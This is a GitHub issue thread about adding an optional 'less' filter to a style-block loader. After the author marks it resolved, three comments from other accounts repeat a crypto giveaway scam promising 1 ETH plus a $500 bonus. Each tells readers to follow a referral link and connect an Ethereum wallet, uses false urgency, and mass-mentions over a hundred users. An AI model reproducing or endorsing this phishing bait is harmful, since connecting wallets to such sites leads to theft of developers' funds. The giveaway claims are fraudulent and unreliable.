### ISSUE TITLE
Adding optional filter for less block

### ISSUE THREAD

**Issue by AndreaCardamone** [AndreaCardamone/style-block-loader#2]
If the filter is enable by the loader query like

"style-block?filter=less"

The loader checks for the rel attributes
```html
<style rel="stylesheet/less">....</style>
```

**Comment by AndreaCardamone** [comment]
Resolved #1439a2b599dd23e2cf388a5127c4da9d88f42d37

**Comment by byungster** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
aminenurgynk, @felipericieri, @ethan-jiang-1, @tracy-e, @eteryko, @stall84, @marekpizner, @pranshu-taneja, @yazz, @VManolas, @okanaslan, @jesinnott, @nlok5923, @sergkop, @3amlab, @teashophouse, @meaze0507, @MatthieuScarset, @D-ping, @lubaoyilang, @pachaibalaji, @vsokolovsky555, @walkjoy, @Dossi1, @sergeiwallace, @CQBinh, @jibolaoseni, @Woasmahdi, @germancoines, @jsongo, @Oswal22, @jesusprubio, @kasmaldev, @yalcincosar, @rdziubek, @henry701, @karlosmid, @ndphuong, @kit-l, @InuCash, @mehmetboraezer, @ChainMav, @IMRFeng, @Jaetoxi, @uberswe, @christophercelaya, @jgh2i, @dkey19, @bubcoco, @nizarhmainDzhuneyt, @idrisguler, @enuoCM, @bradishp, @Kostayne, @simoncollins, @lpsm-dev, @vidalpaul, @TheArhaam, @sis6326r, @Tarak1981, @ljieyao, @jmdatasci, @Aixile, @jeffsmale90, @joshstevens19, @happyliu2014, @pyadav, @coffeemood, @raxelz, @Mziserman, @MessageDream, @piemonte, @gautierdag, @z-order, @bartezz19, @LoopyLuci, @manuelportakal, @ak2k, @QiMa, @thesecondbull, @ColdDevil, @3scava1i3r, @chris510, @ashutoshsinghparmar, @cber, @saadjhk, @josephwinston, @serinth, @henriquechagasg, @hamnaanaa, @dreammaster38, @EmanHerawy, @chachaxw, @ithinker1991, @ATrnd, @JithinKS97, @thomasmodeneis, @truongnghia, @joydxofficialdatramt, @Mayank17M, @anargi, @dorucioclea, @okanaslan, @fummicc1, @truongnghia, @ngan, @MyGithub-1, @MJSPollard, @01JAMIL, @ahmetozlu, @DevJihwan, @archie-bryann, @haimingZZ, @Vagahbond, @CodSaber, @shahad9090, @jevans12, @lorenzodisidoro, @DanailMinchev, @richard-vu, @briababby, @VanshajDaga, @rustamqua, @Phouatong, @sheepc, @Mart-Coul, @tkasuz, @pabloquinteros, @SaintJackson, @nunohora, @pnpolcher, @GabrielBrotas, @PompaDonpa, @jjthomps, @zmlu, @AaHUANG1998, @k0er, @Amila-Rukshan, @Dzhakhbarkhan, @hpduong, @srdjan, @wairimumiringu6, @AliSawari, @LeoBorquez, @mikesposito, @mdmmn378, @, @Schooley93

**Comment by AbstractsMachine** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by byungster** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Sultan099, @BankNatthapon, @hmasum52, @rupshabagchi, @MartinBucko, @dasibcryptoidology, @seungwon2, @cnskyboy88, @DeeJayElly, @ArnaudFavier, @wedik66, @damilola-adeogun, @MaximePIERRONT, @thanasik, @pcieslinski, @qpwoeiru96, @d-fuji, @YYwishp, @dallonasnes, @Brdjx, @MileanCo, @tomonari-t, @shahriarhossain, @TobiahRex, @bmcgoffin, @yuanyunliang, @vizzdoom, @gitalfredo, @brunob15, @marcj, @ugoostanleyibe, @sirivus, @hhstore, @apoorv-2204, @aretcamgoz, @wpank, @madwiki, @progsmile, @thonythony, @ZaneH, @Bati84, @mdeecode, @coinrule-token, @Guidosalimbeni, @Xaber20110202, @cao7113, @StephenHero, @rohanp, @btobin, @BhargavMahajanyylonly, @cjohansen11, @imxiaow, @Sultan099, @wlwr, @saeb-panahifar, @micoolee, @dasibcryptoidology, @yangli-io, @chrisbarry, @seungwon2, @cnskyboy88, @tiwament1477, @wodingdong, @xcorp1986, @damilola-adeogun, @briancorbinxyz, @Junxwan, @vv5d, @pavelkogen, @mgarciat1090, @FractalVisionz, @wedik66, @themartorana, @BhargavMahajan, @DominikGithub, @Dappchain, @crimeminister, @tajpouria, @aretcamgoz, @ahmedzaabal, @bmorelax, @d-fuji, @jmconrad, @Guillerbr, @wilcollins, @locdangxuan, @zjhiphop, @bernestoalberto, @nelix, @bigraf, @eliasearlym, @tudyzhb, @GIANTCRAB, @saiganov, @mariodelac1389, @southpawgeek, @kokassa, @olegnn, @eobarebriancorbinxyz, @BankNatthapon, @ShimmerPig, @mlr, @julweber, @shahriarhossain, @mark2021blue, @FractalVisionz, @badwtg1111, @GhostChild, @blackguywhocodes, @WizardSource, @agrcrobles, @zhaopufeng, @locdangxuan, @wanglixuan123, @bizliaoyuan, @GIANTCRAB, @ahmedzaabal, @yichya, @Webmoss, @JuanPaulino, @ntdvn, @blamebeatz, @alfonmga, @shams-nahid, @tiwament1477, @Xaber20110202, @yylonly, @jTanG0506, @zza136055370, @amio, @wodingdong, @AlexanderFSP, @huangkaiqiao, @alphashr, @damilola-adeogun, @sorshion, @Driaan, @wilcollins, @rsxss, @bmorelax, @zuoguoji, @aMimikyu, @robertoriy, @sg552, @16CentAstrology, @jsongo, @gguimp, @jeijei4
